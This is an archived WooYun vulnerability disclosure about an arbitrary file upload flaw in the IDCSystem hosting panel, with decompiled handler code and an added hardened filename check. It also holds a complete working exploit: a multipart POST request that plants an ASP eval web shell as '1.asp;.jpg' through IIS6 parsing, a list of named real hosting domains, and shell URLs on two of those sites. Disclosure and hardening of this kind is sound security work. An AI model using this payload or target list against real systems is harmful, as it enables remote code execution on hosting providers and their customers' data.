WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-06-17: Details reported to the vendor; awaiting vendor response
2015-06-19: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details opened to third-party security partners
2015-08-13: Details opened to core whitehats and experts in related fields
2015-08-23: Details opened to regular whitehats
2015-09-02: Details opened to intern whitehats
2015-09-17: Details disclosed to the public
Upload vulnerability; combined with the IIS6 parsing vulnerability it yields a getshell.
Upload handling code (IDCSystem.dll):
private static string smethod_37()
{
    string uCS = XS.getUCS("uss", 1);
    string text = HttpContext.Current.Request.Headers["action"]; // action is read from an HTTP header
    string text2 = HttpContext.Current.Server.MapPath(XS.getUploadConfig("get_temp_dir", "prefix"));
    string text3 = text;
    string result;
    if (text3 != null)
    {
        if (!(text3 == "ftheme") && !(text3 == "btheme") && !(text3 == "js_plugin"))
        {
            if (text3 == "attachment") // when action is "attachment", enter the upload flow
            {
                goto IL_A9;
            }
        }
        else
        {
            if (!XS.isAdmin())
            {
                result = "-1|No administrative privileges";
                return result;
            }
            goto IL_A9;
        }
    }
    Common.responseMsg("It works!");
IL_A9:
    int num = (HttpContext.Current.Request.Params["chunk"] != null) ? int.Parse(HttpContext.Current.Request.Params["chunk"]) : 0;
    // text4 comes from the "name" parameter and is user-controlled
    string text4 = (HttpContext.Current.Request.Params["name"] != null) ? HttpContext.Current.Request.Params["name"].ToLower() : "temp.jpg";
    string str = (text4.LastIndexOf(".") < 0) ? "unknow" : text4.Substring(text4.LastIndexOf(".") + 1).ToLower();
    string text5 = "," + XS.getUploadConfig(text, "exts") + ",";
    if (text5.IndexOf("," + str + ",") < 0)
    {
        result = "-1|" + xUser.smethod_40(text2, string.Concat(new string[]
        {
            "UserID:", uCS, "\r\nUserIP:", HttpContext.Current.Request.UserHostAddress, "\r\nMessage: Invalid file type:", text4
        }));
    }
    else
    {
        // The upload is saved to text2 + text4; text4 is user-controlled, so the path is controllable
        FileStream fileStream = new FileStream(text2 + text4, (num == 0) ? FileMode.OpenOrCreate : FileMode.Append);
        byte[] array = null;
        if (HttpContext.Current.Request.ContentType == "application/octet-stream" && HttpContext.Current.Request.ContentLength > 0)
        {
            array = new byte[HttpContext.Current.Request.InputStream.Length];
            HttpContext.Current.Request.InputStream.Read(array, 0, array.Length);
        }
        else
        {
            if (HttpContext.Current.Request.ContentType.Contains("multipart/form-data") && HttpContext.Current.Request.Files.Count > 0 && HttpContext.Current.Request.Files[0].ContentLength > 0)
            {
                array = new byte[HttpContext.Current.Request.Files[0].InputStream.Length];
                HttpContext.Current.Request.Files[0].InputStream.Read(array, 0, array.Length);
            }
        }
        if (array != null)
        {
            fileStream.Write(array, 0, array.Length);
        }
        fileStream.Close();
        fileStream.Dispose();
        result = "0";
    }
    return result;
}
File extensions are restricted, but the IIS6 parsing vulnerability can be used to get a shell: only the text after the last dot is checked, so a name ending in ".jpg" passes even when IIS6 will treat the part before ";" as the real file name.
Far fewer sites still run IIS6 these days:
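Added example (my code, not from IDCSystem.dll or the vendor): it reproduces the last-dot extension check from the decompiled code beside a hardened check, and derives the stored name from a GUID rather than from the client, which is the fix this report suggests. The allowlist contents and all method names are assumptions.

```csharp
using System;
using System.IO;
using System.Linq;

public static class UploadNameCheck
{
    // Assumed allowlist; in the original it comes from XS.getUploadConfig(action, "exts").
    static readonly string[] AllowedExts = { "jpg", "jpeg", "gif", "png" };

    // Mirrors the original logic: only the text after the LAST dot is compared
    // against the allowlist, so "1.asp;.jpg" and "sub\1.jpg" are both accepted.
    public static bool OriginalCheckAccepts(string name)
    {
        name = name.ToLowerInvariant();
        int dot = name.LastIndexOf('.');
        string ext = dot < 0 ? "unknow" : name.Substring(dot + 1);
        return ("," + string.Join(",", AllowedExts) + ",").IndexOf("," + ext + ",") >= 0;
    }

    // Hardened check: the whole name must be <token>.<allowed ext> where the token
    // contains only letters, digits, '_' or '-'. A second dot, ';', '/', '\' or a
    // NUL byte all cause rejection, so IIS6 cannot see a different name than we do.
    public static bool HardenedCheckAccepts(string name)
    {
        if (string.IsNullOrEmpty(name) || name.Length > 100) return false;
        string[] parts = name.Split('.');
        if (parts.Length != 2 || parts[0].Length == 0) return false;
        if (!parts[0].All(c => char.IsLetterOrDigit(c) || c == '_' || c == '-')) return false;
        return AllowedExts.Contains(parts[1].ToLowerInvariant());
    }

    // The stored name never derives from client input (the report's fix: random file names);
    // only the validated extension is kept. Caller joins this with the upload directory.
    public static string StoredName(string clientName)
    {
        if (!HardenedCheckAccepts(clientName)) throw new ArgumentException("invalid file name");
        string ext = clientName.Split('.')[1].ToLowerInvariant();
        return Guid.NewGuid().ToString("N") + "." + ext;
    }

    public static void Main()
    {
        foreach (var n in new[] { "1.jpg", "1.asp;.jpg", "sub\\1.jpg", "1.asp" })
            Console.WriteLine($"{n,-12} original={OriginalCheckAccepts(n),-5} hardened={HardenedCheckAccepts(n)}");
        Console.WriteLine("stored as: " + StoredName("1.jpg"));
    }
}
```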
cp.korea-vps.com
www.90dns.net
www.10028.it
www.aituyun.com
www.ccwiz.com
www.tjwq.wang
www.zhengdavps.com
www.xeonidc.com
Taking www.10028.it as an example (login required):
POST http://www.10028.it/upload.aspx?at=upload HTTP/1.1
Host: www.10028.it
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryctAyyCGABVVmjkwn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
action: attachment
Cookie: uname=testxxoo; uss=hCkshKbroAa/8ORwcPi//A==

------WebKitFormBoundaryctAyyCGABVVmjkwn
Content-Disposition: form-data; name="img"; filename="1.jpg"
Content-Type: image/jpeg

<%eval(request("aa"))%>
------WebKitFormBoundaryctAyyCGABVVmjkwn
Content-Disposition: form-data; name="name"

1.asp;.jpg
------WebKitFormBoundaryctAyyCGABVVmjkwn--
Shell address after upload: http://www.10028.it/files/temp/1.asp;.jpg
http://www.xeonidc.com/files/temp/1.asp;.jpg
Randomize file names.
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-06-19 12:13
Thank you very much for your feedback; we are already working on a remediation plan for this IIS6 vulnerability!
None yet.